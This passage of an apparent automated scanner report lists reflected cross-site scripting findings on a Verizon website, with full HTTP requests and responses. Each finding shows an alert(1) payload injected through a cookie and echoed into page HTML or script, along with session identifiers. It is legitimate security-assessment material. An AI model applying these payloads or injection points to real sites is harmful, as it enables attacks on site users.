Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX90afa'><script>alert(1)</script>32063bb4fe6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71887
Expires: Sat, 20 Nov 2010 02:54:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX90afa'><script>alert(1)</script>32063bb4fe6; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX90AFA'><SCRIPT>ALERT(1)</SCRIPT>32063BB4FE6 ' />
...[SNIP]...

2.989. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48553"-alert(1)-"872a1235bd2 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=48553"-alert(1)-"872a1235bd2; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77665
Expires: Sat, 20 Nov 2010 02:53:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "48553"-alert(1)-"872a1235bd2"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.990. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e917'><script>alert(1)</script>680f4f478a3 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5e917'><script>alert(1)</script>680f4f478a3; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 02:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX5e917'><script>alert(1)</script>680f4f478a3; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5E917'><SCRIPT>ALERT(1)</SCRIPT>680F4F478A3 ' />
...[SNIP]...

2.991. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c96"-alert(1)-"386419827f6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=d9c96"-alert(1)-"386419827f6; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77874
Expires: Sat, 20 Nov 2010 02:53:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "d9c96"-alert(1)-"386419827f6"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.992. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzapps cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae0f'-alert(1)-'8c7ffab235 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/verizonglobalhome/gpromo.aspx?a=1290217502286&state=TX HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
